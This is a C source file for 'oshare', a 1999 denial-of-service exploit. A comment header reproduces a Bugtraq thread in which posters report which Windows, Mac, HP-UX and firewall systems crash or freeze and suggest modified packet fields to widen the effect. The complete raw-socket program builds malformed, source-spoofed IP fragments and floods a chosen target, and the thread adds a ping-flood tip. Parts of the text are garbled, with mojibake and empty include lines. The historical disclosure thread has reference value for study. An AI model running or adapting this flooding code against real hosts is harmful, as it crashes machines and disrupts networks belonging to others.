/* Date: Thu, 28 Jan 1999 09:41:24 -0800 From: Aleph One To: BUGTRAQ@netspace.org Subject: Re: oshare testing A summary of the replies from people testing the oshare program against different versions of Windows: Reported Vulnerable (Crash): Windows 95 Nicu Pavel Windows 95 "C.J. Oster" Windows 95 + USB kpavlov@srgtampa.com Windows 95 OSR2 Nicu Pavel Windows 95 Japanese sen_ml@eccosys.com Windows 95 DK attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4 nino@inform.dk Windows 95 UK attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4 nino@inform.dk Windows 98 Nicu Pavel Windows 98 maniac@JADIERKO.LOCALHOST.SK Windows 98 Japanese sen_ml@eccosys.com Windows 98 UK attack from Linux 2.2.0, 2.0.36 and SunOS 4.1.4 nino@inform.dk Reported Vulnerable (Frozen, no BSOD): Windows 98 4.10.1998 all windowsupdate patches. Launched attack from Linux. "Keith Warno" Reported Vulnerable (Frozen until packets stop): Windows 98 "C.J. Oster" Windows 98 Vanja Hrustic Reported Not Vulnerable: Windows 98 English sen_ml@eccosys.com Windows 98 tested from Linux tsd@Cal001307.student.utwente.nl Window NT 4.0 SP3 maniac@JADIERKO.LOCALHOST.SK Windows NT 4.0 SP4 Japanese sen_ml@eccosys.com Linux 2.0.36 maniac@JADIERKO.LOCALHOST.SK Someone also mentioned that Linux (2.0.36) replaces the ip total length field with 40, the actual ip-packet length (as seen by pcap). -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 -------------------------------------------------------------------------- Date: Mon, 25 Jan 1999 15:38:43 +0900 From: DEF CON ZERO WINDOW To: BUGTRAQ@netspace.org Subject: Win98 crash? Hi, Windows98 crashed by the packet which added a hand to the value of the IP header of the packet a little. (From now, the packet of this structure is called with "oshare packet".) Because it isn't familiar, I don't know what kind of error happens concretely inside OS to the inside of Windows. But, ihl and tot_len. Then, it guesses that crash will happen by the value of frag_bit&frag_off. But, because value is wrong, this "oshare packet" can't be transmitted to the outside of the network. This is here well, and it is here badly, too. But, even whose machine will be able to be killed in the same segment. Before someone improves this program, MicroSoft should take a countermeasure immediately. A Macintosh crashed by the "oshare packet" in the same way, too. But, it isn't realized by this program. It will be released soon. Reboot hangs freely if it becomes blue screen when Windows98 receives a "oshare packet". When blue screen comes out, the function of the network can't be used any more after it. The error of TCP/IP is started in the case of the Macintosh, and the function of the network can't be used any more. Is this phenomenon a bug? $B!3 (B( $B!-! To: BUGTRAQ@netspace.org Subject: Re: Win98 Crash? DEF CON ZERO WINDOW wrote... > But, because value is wrong, this "oshare packet" can't be transmitted > to the outside of the network. This is here well, and it is here badly, > too. But, even whose machine will be able to be killed in the same > segment. This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b, Build Number: 3083. (Sun Sparc, Solaris 2.5.1) After running it I lost internet connectivity and saw the following on the console of our firewall server: FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 FW-1: packet size too big (131060) from 0x01010101, ip_p=17 The machine could not be soft booted and need to be hard booted (power cycled) I will not (or cannot) try and duplicate this, since I can't afford to crash our firewall again :) To give a brief network sketch: Linux Box (running oshare) -> Router -- Frame Relay -> Router -> Firewall-1 machine -> Dest Win98 box I cannot confirm that this program crashed our firewall, but I would say it's a safe bet. I'm no C programmer, but I think this part here is the guilty part: (Line 65 or so) ip->frag_off = htons( 16383 ); ip->ttl = 0xff; ip->protocol = IPPROTO_UDP; ip->saddr = htonl( inet_addr( "1.1.1.1" ) ); ip->daddr = dst_addr; ip->check = in_cksum( ( u_short *)ip, 44 ); YMMV, of course. Dorqus ----------------------------------------------------------------------------- Date: Wed, 27 Jan 1999 04:08:22 +0700 From: Vanja Hrustic To: BUGTRAQ@netspace.org Subject: Re: Win98 Crash? At 14:31 25/01/99 -0500, dorqus maximus wrote: >This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b, >Build Number: 3083. (Sun Sparc, Solaris 2.5.1) [snip] Little modification in the source. For example... ---------------------------------------------- ip->ihl = 22; ip->frag_off = htons( -16383 ); ---------------------------------------------- Compile, and send heaps of packets ('./oshare x.x.x.x 300' for example) to local Windows 98/NT box. It should freeze (literally) while packets are travelling. It recovers after the 'attack' is finished (shouldn't be a big problem to leave a process in the background that will send packets forever). This was tested against Windows 98 and Windows NT 4.0 ( 2 Workstations and 1 Server - all with SP4 applied, no post SP4 hotfixes). *Please*, don't mail me with "It didn't work for me!" - that's why I post it here, so people can test & make summaries. Play around with source, you can get interesting effects (and responses from router :). Don't try to flood NT boxes outside internal network - packets won't get out (they didn't for me - others could have different results). It will also affect HP-UX (tested against 10.20), but I didn't get more than "jumping mouse" effect. Load is higher, but machine is functional. Linux (2.0.36 and 2.2.0-pre4) was not affected. (final note: program was compiled and 'initiated' on linux box w/ 2.2.0-pre4 kernel) Regards, Vanja Hrustic Information Systems Manager Siam Relay Ltd. Phone: +662-713-5130 Fax : +662-713-5132 http://www.siamrelay.com - Siam Relay Ltd. - Security & E-Commerce http://safer.siamrelay.com - Security Alert For Enterprise Resources ----------------------------------------------------------------------------- Date: Wed, 27 Jan 1999 07:49:27 +0900 From: DEF CON ZERO WINDOW To: BUGTRAQ@netspace.org Subject: Re: Win98 Crash?(An additional item) Hi, The cause that it doesn't work well is thought to be here. 1) A difference in the version of OS. It works with ja, and it may not work with en. 2) Modification of the code. When it was rewritten, my acquaintance's machine crashed a part. This modification makes the cause of the bug much more vague, Only, by 100 packet. B!3(B!-!ihl = rand() % 16; ip->tot_len = rand() % 0xffff; Signed by R00t Zer0( e-mail : defcon0@ugtop.com ) ----------------------------------------------------------------------------- Date: Tue, 26 Jan 1999 13:41:36 -0800 From: route@RESENTMENT.INFONEXUS.COM To: BUGTRAQ@netspace.org Subject: Re: Win98 Crash? [dorqus maximus wrote] | | This oshare.c code may have crashed our Checkpoint Firewall-1, version 3.0b, | Build Number: 3083. (Sun Sparc, Solaris 2.5.1) Sending 10,000 (not really --see below) of these `oshare` packets failed to do anything to the following machines: OpenBSD 2.4 FreeBSD 3.0 Solaris 2.7 Linux 2.1.124 SMP Windows 98 A cursory glance at the code reveals two noteworthy things: 1. There is no pause during packet injection. This results in a large amount of dropped packets. Your results will vary, but on my 100Mb ethernet, I saw about a 30% - 40% packet loss. 2. The packet is built inside a 40 byte buffer, yet is assigned a size of 44 bytes (and a header length of 44 bytes). The checksum is also computed across this phantom 44 byte size. When injecting into the network, however, only the original 40 bytes are written (anything larger, of course, would likely end up SIGSEGVing). The end result is a bad checksum on the other end. Finally, in closing, allow me to shamelessly plug libnet. Again. Libnet, simply put, is a C library for portable packet creation. The above `exploit` under libnet, can be rewritten portably in minutes. Beyond that (especially when combined with libpcap) it can be used to build powerful network applications without worrying about low-level packet interface nuances. Soon to be released version .10 offers numerous bug and portability fixes, several new utility and packet building modules, as well as additions to the FreeBSD and OpenBSD Ports collection. http://www.infonexus.com/~daemon9/Libnet -- I live a world of paradox... My willingness to destroy is your chance for improvement, my hate is your faith -- my failure is your victory, a victory that won't last. -------------------------------------------------------------------------- Date: Tue, 2 Feb 1999 23:58:27 -0600 From: C.J. Oster To: BUGTRAQ@netspace.org Subject: More oshare testing. While testing the oshare attack a little more, I have found something that you may find interresting. Here at the university, many people are running the same installation of windows, ie off of the same cd, same patches, etc. The differences in behavior seem to be due to the type of network card installed in the machine. Here is a VERY small list. win95 is broken and bluescreens all the time. win98 with the following network cards... LinkSys ISA (ne2000 chipset): Spontaneous Reboot. LinkSys PCI (ne2000): Blue Screen 3c509 (ISA): Blue Screen 3c590 (PCI): Some Blue Screens, others Hang 3c905 (PCI): Hangs until packets stop comming, then complete wakup. I wasn't able to test macs because we have so few here, but the two I did test either froze completly or had no effect. Results were not consistent. So the question now is "Is oshare a hardware driver problem and not a winsock bug?" -CJO- -------------------------------------------------------------------------- Date: Fri, 5 Feb 1999 07:27:08 -0200 From: Fabio Bastiglia Oliva To: BUGTRAQ@netspace.org Subject: Oshare tests table Hello, My english is not so good! Sorry! :) But I hope that my table may help with the oshare tests. The table below shows the oshare tests results that I made in my network enviroment. I made these tests in English and Portuguese versions of Windows. --- My Network enviroment: Servers Novell Netware 4.11 IPX - TCP/IP Linux Slackware 3.6 SunOS 5.6 NICs (Network Interface Card) Genius Encore Realtek 3Com - 3C905b-TX HUBs 3Com - Super Stack II --- ----------------------------------- Effects: S - Frozen until packet stop F - Frozen B - Blue Screen R - Reboot ----------------------------------- AtkSrc (Attack Source): L - Linux S - SunOS ----------------------------------- Info: F - Full Install U1 - Up from Windows 3.xx U2 - Up from Windows 95 (4.00.950) U3 - Up from Windows 95 (4.00.1111) C - Conseal PC Firwall Installed ----------------------------------- Lang (Language): E - English P - Portuguese ----------------------------------- Test Results: +----------------------+------+--------+--------+----------+-----------+ | OS & Version | Vuln | Effect | AtkSrc | Info | Lang | +----------------------+------+--------+--------+----------+-----------+ |Windows 95 4.00.950 | YES | F B | L S | F | E P | | |------+--------+--------+----------+-----------+ | | YES | F B | L S | U1 | E P | | |------+--------+--------+----------+-----------+ | | YES | F B S | L S | U1 C | E P | +----------------------+------+--------+--------+----------+-----------+ |Windows 95 4.00.1111 | YES | F B | L S | F | E P | | or |------+--------+--------+----------+-----------+ |Windows 95 950b | YES | F B | L S | U1 | E P | | |------+--------+--------+----------+-----------+ | | YES | F B S | L S | U1 C | E P | +----------------------+------+--------+--------+----------+-----------+ |Windows 98 4.10.1998 | YES | R | L S | F | E P | | |------+--------+--------+----------+-----------+ | | YES | F R | L S | U2 | E P | | |------+--------+--------+----------+-----------+ | | YES | F R | L S | U3 | E P | | |------+--------+--------+----------+-----------+ | | YES | S | L S | F C | E P | | |------+--------+--------+----------+-----------+ | | YES | S | L S | U2 C | E P | | |------+--------+--------+----------+-----------+ | | YES | S | L S | U3 C | E P | +----------------------+------+--------+--------+----------+-----------+ |Windows NT 4 SP4 | NO | --- | --- | F | E | +----------------------+------+--------+--------+----------+-----------+ |Windows 2000 Beta | NO | --- | --- | F | E | +----------------------+------+--------+--------+----------+-----------+ |Linux Slackware 2.0.36| NO | --- | --- | --- | --- | +----------------------+------+--------+--------+----------+-----------+ Multiple acronyms means that the test results are the same or the test generate different/multiple effects in the same system. Best Regards ------------------------------- Fabio Bastiglia Oliva fboliva@safenetworks.com Safe Networks Informatica LTDA. http://www.safenetworks.com -------------------------------------------------------------------------- Date: Fri, 5 Feb 1999 23:08:47 -0500 From: rewt To: BUGTRAQ@netspace.org Subject: Re: Oshare tests table Try pinging the windows box with large amounts of icmp...I left 5 screened pings, each set to 65000 size...Windows will freeze shortly after its loaded. You might also try to ping with -f. -------------------------------------------------------------------------- */ /****************************************************************************/ /* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */ /* */ /* */ /* */ /* */ /* This program transmits the "oshare" packet which starts a machine aga- */ /* in or crash. But, because it can't pass through the router, it can be */ /* carried out only in the same segment. */ /* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */ /* nged, it has already tested that it becomes possible to kill Mac, too. */ /* ----------------------------------------- */ /* Written by R00t Zer0 */ /* E-Mail : defcon0@ugtop.com */ /* Web URL : http://www.ugtop.com/defcon0/index.htm */ /****************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include u_short in_cksum( u_short *, int ); int send_oshare_packet( int, u_long ); int send_oshare_packet( int, u_long ); u_short in_cksum( u_short *addr, int len ) { int nleft = len; u_short *w = addr; int sum = 0; u_short answer = 0; while( nleft > 1 ) { sum += *w++; nleft -= 2; } if (nleft == 1) { *( u_char *)( &answer ) = *( u_char *)w; sum += answer; } sum = ( sum >> 16 ) + ( sum & 0xffff ); sum += ( sum >> 16 ); answer = ~sum; return( answer ); } int send_oshare_packet( int sock_send, u_long dst_addr ) { char *packet; int send_status; struct iphdr *ip; struct sockaddr_in to; packet = ( char *)malloc( 40 ); ip = ( struct iphdr *)( packet ); memset( packet, 0, 40 ); ip->version = 4; ip->ihl = 11; ip->tos = 0x00; ip->tot_len = htons( 44 ); ip->id = htons( 1999 ); ip->frag_off = htons( 16383 ); ip->ttl = 0xff; ip->protocol = IPPROTO_UDP; ip->saddr = htonl( inet_addr( "1.1.1.1" ) ); ip->daddr = dst_addr; ip->check = in_cksum( ( u_short *)ip, 44 ); to.sin_family = AF_INET; to.sin_port = htons( 0x123 ); to.sin_addr.s_addr = dst_addr; send_status = sendto( sock_send, packet, 40, 0, ( struct sockaddr *)&to, sizeof( struct sockaddr ) ); free( packet ); return( send_status ); } int main( int argc, char *argv[] ) { char tmp_buffer[ 1024 ]; int loop, loop2; int sock_send; u_long src_addr, dst_addr; u_short src_port, dst_port; struct hostent *host; struct sockaddr_in addr; time_t t; if( argc != 3 ) { printf( "Usage : %s \n", argv[0] ); exit( -1 ); } t = time( 0 ); srand( ( u_int )t ); memset( &addr, 0, sizeof( struct sockaddr_in ) ); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr( argv[1] ); if( addr.sin_addr.s_addr == -1 ) { host = gethostbyname( argv[1] ); if( host == NULL ) { printf( "Unknown host %s.\n", argv[1] ); exit( -1 ); } addr.sin_family = host->h_addrtype; memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length ); } memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 ); if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1) { perror( "Getting raw send socket" ); exit( -1 ); } printf( "\n\"Oshare Packet\" sending" ); fflush( stdout ); for( loop = 0; loop < atoi( argv[2] ); loop++ ) { for( loop2 = 0; loop2 < 1000; loop2++ ) send_oshare_packet( sock_send, dst_addr ); fprintf( stderr, "." ); fflush( stdout ); } printf( "\n\nDone.\n\n" ); fflush( stdout ); close( sock_send ); exit( 0 ); }